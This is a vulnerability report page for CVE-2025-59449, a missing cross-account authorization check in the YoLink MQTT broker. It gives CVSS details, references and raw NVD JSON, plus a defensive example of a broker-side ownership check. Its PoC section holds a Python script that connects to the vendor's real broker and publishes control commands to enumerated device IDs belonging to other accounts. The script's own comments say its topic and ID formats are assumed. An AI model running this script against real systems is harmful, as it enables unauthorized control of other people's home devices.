Security Vulnerability Report
CVE-2025-59449 CVSS 4.9 MEDIUM

CVE-2025-59449

Published: 2025-10-06 20:15:36
Last Modified: 2026-04-15 00:35:42

Description

The YoSmart YoLink MQTT broker through 2025-10-02 does not enforce sufficient authorization controls to prevent cross-account attacks, allowing an attacker to remotely operate affected devices if the attacker obtains the associated device IDs. Because YoLink device IDs are predictable, an attacker can exploit this to gain full control over any other YoLink user's devices.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N

Scope is Changed because an ordinary authenticated account (PR:L) affects devices owned by other accounts. The vector is the CNA's assessment (type Secondary in the NVD record; no Primary NVD score is present) and rates confidentiality and integrity impact Low with High attack complexity, which is more conservative than the description's "full control over any other YoLink user's devices". The weakness assigned is CWE-863 (Incorrect Authorization): the broker authenticates the account but does not check that the account owns the device it is addressing.

Configurations (Affected Products)

No CPE configuration data is present in the NVD record (vulnStatus: Deferred).

Affected, per the description: YoSmart YoLink MQTT Broker through 2025-10-02. The broker is a vendor-operated service, so the date bounds the affected period rather than naming a software version; see the YoSmart advisory SA-2025-001 in References.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-59449 PoC - YoSmart YoLink MQTT Cross-Account Attack
# This PoC demonstrates the insufficient authorization in YoLink MQTT broker
# allowing cross-account device control via predictable device IDs
#
# Caveat: the broker hostname and port, the topic layout and the device-ID
# pattern below are the PoC author's assumptions. The advisory text only
# states that the broker lacks cross-account authorization and that device
# IDs are predictable; it does not document the wire format.
import json
import time

import paho.mqtt.client as mqtt

# YoSmart MQTT broker configuration (assumed endpoint)
MQTT_BROKER = "mqtt.yosmart.com"
MQTT_PORT = 8883
MQTT_USERNAME = "[email protected]"  # Attacker's own credentials
MQTT_PASSWORD = "attacker_password"  # Attacker's own password


def on_connect(client, userdata, flags, rc):
    if rc == 0:
        print(f"[*] Connected to YoLink MQTT broker with result code {rc}")
    else:
        print(f"[!] Connection failed with code {rc}")


def on_message(client, userdata, msg):
    print(f"[*] Received message on topic {msg.topic}: {msg.payload.decode()}")


def predict_device_ids(base_pattern, count=100):
    """
    Predict YoLink device IDs based on known patterns.
    Device IDs are sequential or follow a predictable pattern.
    The "<base>-NNNN" layout is a placeholder assumed by the PoC author.
    """
    predicted_ids = []
    for i in range(count):
        device_id = f"{base_pattern}-{i:04d}"
        predicted_ids.append(device_id)
    return predicted_ids


def craft_control_message(device_id, action="on"):
    """
    Craft MQTT control message for a target YoLink device.
    Topic and payload layout are assumed, not taken from the advisory.
    """
    topic = f"yl-home/{device_id}/control"
    payload = json.dumps({
        "action": action,
        "timestamp": int(time.time()),
        "source": "attacker",
    })
    return topic, payload


def exploit():
    # Step 1: Connect to MQTT broker with the attacker's own, legitimate
    # credentials. The flaw is that the broker authenticates the account but
    # never checks that the device named in the topic belongs to it.
    client = mqtt.Client(client_id="attacker_client")
    client.username_pw_set(MQTT_USERNAME, MQTT_PASSWORD)
    client.tls_set()  # Use TLS encryption
    client.on_connect = on_connect
    client.on_message = on_message

    print("[*] Connecting to YoLink MQTT broker...")
    client.connect(MQTT_BROKER, MQTT_PORT, 60)
    client.loop_start()
    time.sleep(2)

    # Step 2: Predict target device IDs
    print("[*] Predicting target device IDs...")
    target_device_ids = predict_device_ids("dev_abc123", count=50)

    # Step 3: Attempt cross-account control
    for device_id in target_device_ids:
        topic, payload = craft_control_message(device_id, action="on")
        print(f"[*] Attempting to control device: {device_id}")
        # Publish control command to target device.
        # MQTT_ERR_SUCCESS only means paho queued the packet locally; an
        # MQTT 3.1.1 broker that rejects a publish on authorization grounds
        # drops it silently (a QoS 1 PUBACK still arrives), so "[+]" is not
        # evidence the command reached the device. Confirm via the device's
        # own state/report topic or the owner's app.
        result = client.publish(topic, payload, qos=1)
        if result.rc == mqtt.MQTT_ERR_SUCCESS:
            print(f"[+] Control command sent to {device_id}")
        else:
            print(f"[-] Failed to send command to {device_id}")
        time.sleep(0.5)

    client.loop_stop()
    client.disconnect()
    print("[*] Exploit completed")


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-59449 - YoSmart YoLink MQTT Cross-Account Attack")
    print("Disclaimer: For authorized security testing only")
    print("=" * 60)
    exploit()
```
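The broker-side check the description says is missing, as an added example that is not YoSmart's code and is not taken from the advisory or from the PoC above. It models an MQTT publish/subscribe authorizer over an assumed per-device topic layout (yl-home/<device_id>/control or /report, the same placeholder the PoC uses) and a constructed account-to-device ownership table: the vulnerable policy accepts any authenticated account, the fixed policy adds the object-level ownership check that CWE-863 is about. It also shows the other half of the mitigation, a 128-bit random device ID that cannot be enumerated the way the sequential IDs in the description can. All names, topics and IDs are assumptions for this example.

```python
"""Added example (not YoSmart's code): broker-side authorization for
per-device MQTT topics, the vulnerable policy beside the fixed one.

Assumptions, constructed for this example only:
  * topic layout  yl-home/<device_id>/<control|report>
  * an in-memory account -> device ownership table
"""
import re
import secrets

# Constructed tenancy table. The sequential IDs deliberately mimic the
# "predictable device IDs" the advisory describes.
OWNERSHIP = {
    "alice": {"dev-0001", "dev-0002"},
    "bob": {"dev-0003"},
}

# Assumed topic grammar; device IDs are alphanumeric or dash-separated tokens.
TOPIC_RE = re.compile(
    r"^yl-home/(?P<device_id>[A-Za-z0-9-]+)/(?P<kind>control|report)$"
)


def device_id_from_topic(topic):
    """Return the device ID embedded in an assumed per-device topic, or None."""
    m = TOPIC_RE.match(topic)
    return m.group("device_id") if m else None


def authorize_vulnerable(account, topic):
    """CWE-863 policy: authentication is the only gate.

    Any known account may publish to any well-formed device topic, so an
    attacker holding an ordinary login of their own can command other
    tenants' devices as soon as they guess the IDs.
    """
    return account in OWNERSHIP and device_id_from_topic(topic) is not None


def authorize_fixed(account, topic):
    """Object-level authorization: the device named in the topic must belong
    to the requesting account. Unknown accounts and malformed topics are
    denied by default. Apply the same check to SUBSCRIBE, or an attacker
    reads other tenants' /report traffic instead of writing /control."""
    device_id = device_id_from_topic(topic)
    if device_id is None:
        return False
    return device_id in OWNERSHIP.get(account, set())


def cross_account_attempts(attacker, candidate_ids):
    """Simulate an ID-enumeration attack against both policies.

    Returns the device IDs whose control topic the attacker may publish to
    under each policy. Under the fixed policy only the attacker's own
    devices remain reachable.
    """
    reachable = {"vulnerable": [], "fixed": []}
    for device_id in candidate_ids:
        topic = f"yl-home/{device_id}/control"
        if authorize_vulnerable(attacker, topic):
            reachable["vulnerable"].append(device_id)
        if authorize_fixed(attacker, topic):
            reachable["fixed"].append(device_id)
    return reachable


def unguessable_device_id():
    """128 bits from the OS CSPRNG as 32 hex characters: enumeration is
    infeasible, so a weak ACL is no longer trivially cross-tenant. This is
    defence in depth; it complements the ownership check, not replaces it."""
    return secrets.token_hex(16)


if __name__ == "__main__":
    # bob enumerates dev-0001..dev-0004 and tries to switch each one on.
    guesses = [f"dev-{i:04d}" for i in range(1, 5)]
    print(cross_account_attempts("bob", guesses))
    # -> {'vulnerable': ['dev-0001', 'dev-0002', 'dev-0003', 'dev-0004'],
    #     'fixed': ['dev-0003']}
    print(unguessable_device_id())
```

The same deny-by-default shape maps directly onto a real broker's ACL or auth plugin (per-client topic patterns derived from the account's device list, with no wildcard grant on yl-home/+/...); the point of the in-memory model is to make the missing check visible rather than to prescribe a broker.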

References

CWE-863: Incorrect Authorization (weakness recorded in the NVD entry)
https://bishopfox.com/blog/advisories
https://bishopfox.com/blog/how-a-20-smart-device-gave-me-access-to-your-home
https://shop.yosmart.com/pages/product-support
https://shop.yosmart.com/pages/sa-2025-001

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59449", "sourceIdentifier": "[email protected]", "published": "2025-10-06T20:15:36.403", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The YoSmart YoLink MQTT broker through 2025-10-02 does not enforce sufficient authorization controls to prevent cross-account attacks, allowing an attacker to remotely operate affected devices if the attacker obtains the associated device IDs. Because YoLink device IDs are predictable, an attacker can exploit this to gain full control over any other YoLink user's devices."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://bishopfox.com/blog/advisories", "source": "[email protected]"}, {"url": "https://bishopfox.com/blog/how-a-20-smart-device-gave-me-access-to-your-home", "source": "[email protected]"}, {"url": "https://shop.yosmart.com/pages/product-support", "source": "[email protected]"}, {"url": "https://shop.yosmart.com/pages/sa-2025-001", "source": "[email protected]"}]}}